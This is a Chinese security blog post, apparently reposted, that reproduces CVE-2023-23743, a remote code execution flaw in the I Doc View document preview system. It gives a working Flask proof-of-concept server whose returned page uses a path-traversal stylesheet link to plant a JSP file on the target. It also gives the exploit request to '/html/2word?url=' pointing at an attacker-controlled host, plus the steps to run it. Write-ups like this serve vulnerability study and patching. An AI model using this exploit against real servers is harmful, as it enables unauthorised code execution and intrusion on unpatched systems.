本人非原创漏洞作者,文章仅作为知识分享用
一切直接或间接由于本文所造成的后果与本人无关
如有侵权,联系删除
产品简介
I Doc View在线文档预览系统是一套用于在Web环境中展示和预览各种文档类型的系统,如文本文档、电子表格、演示文稿、PDF文件等。
开发语言:Java
开发厂商:北京卓软在线信息技术有限公司
漏洞描述
I Doc View在线文档预览系统“/html/2word”的参数“url”存在文件上传漏洞,该漏洞存在于I Doc View的远程页面缓存功能中。由于应用程序无法完全验证用户输入URL的安全性,攻击者可以构建特殊的URL,使服务器下载恶意文件并执行任意代码。
影响版本
iDocView
< 13
.10
.1_20231115
空间测绘
回复“CVE-2023-23743”获取空间测绘语句
漏洞利用
# python代码
from
flask
import
Flask
import
argparse
parse = argparse.ArgumentParser()
parse.add_argument(
"-port"
, type=int, help=
"Save port."
, default=
8989
)
args = parse.parse_args()
app = Flask(__name__)
def
index
()
:
return
"""<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>title</title>
<link rel="stylesheet" href="..\..\..\docview\aaaa.jsp">
</head>
<body>
</body>
</html>"""
def
jsp_file
()
:
return
'''<%
out.print("This is a vul test!");
%>'''
if
__name__ ==
'__main__'
:
app.run(host=
"0.0.0.0"
, port=args.port)
# 利用POC
/html/
2
word?url=http:
//yyy.yyy.yyy:8989/index.html
- 在公网服务器运行python脚本
python
poc.py -port
8989
2.向目标发送请求(xxx.xxx.xxx为目标公网IP或域名,yyy.yyy.yyy为服务器公网IP或域名)
http:
/
/xxx.xxx.xxx/html
/2word?url=http:/
/yyy.yyy.yyy:8989/index
.html
服务器收到请求。
文件上传成功。
参考链接
https:
//buaq.net/go-199519.html
https:
//zhuanlan.zhihu.com/p/668379259
原文始发于微信公众号(不够安全):[漏洞复现]CVE-2023-23743 “I DOC View”远程代码执行
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论